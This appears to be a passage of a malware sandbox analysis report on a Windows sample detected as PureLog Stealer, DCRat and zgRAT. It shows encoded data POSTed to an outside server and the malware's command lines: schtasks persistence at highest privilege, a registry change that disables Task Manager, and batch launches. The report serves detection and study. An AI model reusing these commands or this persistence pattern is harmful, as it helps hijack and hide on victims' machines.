Jan 3, 2025 20:48:58.687091112 CET	232	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 31 39 3a 34 38 3a 35 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 3b 56 5f 56 Data Ascii: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 19:48:58 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 4Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	50096	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:58.812931061 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:59.170186996 CET	2560	OUT	Data Raw: 5f 55 59 59 59 43 5a 56 5a 5c 55 51 59 58 54 5b 56 5d 5d 42 50 53 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _UYYYCZVZ\UQYXT[V]]BPSZ[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%<0'Y3)2$)%4?<<$>>37Z,&&"'(-'_!%Y)?
Jan 3, 2025 20:48:59.436980009 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:59.568761110 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	50097	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:59.714607954 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:49:00.060363054 CET	2560	OUT	Data Raw: 5f 52 5c 58 5c 44 5a 5b 5a 5c 55 51 59 5a 54 50 56 59 5d 46 50 50 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _R\X\DZ[Z\UQYZTPVY]FPPZ\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&)##01>2<3?P(:2U) #:&)Y74;+-'_!%Y)7
Jan 3, 2025 20:49:00.383277893 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:49:00.524929047 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:49:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	50098	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:49:01.572736025 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 1860 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	50099	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:49:01.613631964 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2552 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:49:01.966613054 CET	2552	OUT	Data Raw: 5f 53 5c 53 5c 47 5a 57 5a 5c 55 51 59 5e 54 50 56 5c 5d 45 50 5c 5a 5f 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _S\S\GZWZ\UQY^TPV\]EP\Z_Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%< ;3=1'?3+=<4:Q2>6*#$-59"'?+'_!%Y)+
Jan 3, 2025 20:49:02.322532892 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:49:02.453272104 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:49:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	50100	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:49:02.579777956 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:49:02.935344934 CET	2560	OUT	Data Raw: 5a 56 5c 53 59 4a 5f 51 5a 5c 55 51 59 5b 54 54 56 5b 5d 44 50 54 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZV\SYJ_QZ\UQY[TTV[]DPTZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(<'-*%762,]+.(+4"&W>(-%^ $?+='_!%Y)3
Jan 3, 2025 20:49:03.218236923 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:49:03.348541021 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:49:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	50101	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:49:03.468750000 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:49:03.826119900 CET	2560	OUT	Data Raw: 5f 56 5c 5f 5c 40 5a 52 5a 5c 55 51 59 59 54 52 56 50 5d 41 50 53 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _V\_\@ZRZ\UQYYTRVP]APSZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+ 327.%<<X?-U+B$=!W=#X."44??'_!%Y)
Jan 3, 2025 20:49:04.189882994 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:49:04.324601889 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:49:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Target ID:	0
Start time:	14:46:56
Start date:	03/01/2025
Path:	C:\Users\user\Desktop\kJrNOFEGbQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\kJrNOFEGbQ.exe"
Imagebase:	0x360000
File size:	4'234'106 bytes
MD5 hash:	36BBAFBD00E62A37070764EB4ED93308
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1661222491.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1660775907.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:46:57
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe"
Imagebase:	0x1e0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:47:25
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\hyperComponentFontDhcp\XvQn4w4rSFjKx2xId8OEvj2iij2aJuA.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:47:25
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:47:26
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Imagebase:	0xbf0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:47:26
Start date:	03/01/2025
Path:	C:\hyperComponentFontDhcp\Mscommon.exe
Wow64 process (32bit):	false
Commandline:	"C:\hyperComponentFontDhcp/Mscommon.exe"
Imagebase:	0x5c0000
File size:	3'680'256 bytes
MD5 hash:	C47F34E03D2A705E84CCB97C250966F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1951066729.00000000005C2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.2010012696.0000000012E0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\hyperComponentFontDhcp\Mscommon.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperComponentFontDhcp\Mscommon.exe, Author: Joe Security
Antivirus matches:	Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:47:29
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:47:29
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:47:29
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline"
Imagebase:	0x7ff67da80000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDDA4.tmp" "c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP"
Imagebase:	0x7ff6a8000000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 11 /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 8 /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 10 /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	14:47:30
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:47:31
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 13 /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	14:47:31
Start date:	03/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat"
Imagebase:	0x7ff74ba60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:47:31
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	14:47:31
Start date:	03/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6032c0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	14:47:31
Start date:	03/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff70b7e0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	14:47:31
Start date:	03/01/2025
Path:	C:\ProgramData\SoftwareDistribution\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\SoftwareDistribution\cmd.exe"
Imagebase:	0x220000
File size:	3'680'256 bytes
MD5 hash:	C47F34E03D2A705E84CCB97C250966F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\SoftwareDistribution\cmd.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\SoftwareDistribution\cmd.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	14:47:31
Start date:	03/01/2025
Path:	C:\ProgramData\SoftwareDistribution\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\SoftwareDistribution\cmd.exe"
Imagebase:	0xb50000
File size:	3'680'256 bytes
MD5 hash:	C47F34E03D2A705E84CCB97C250966F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
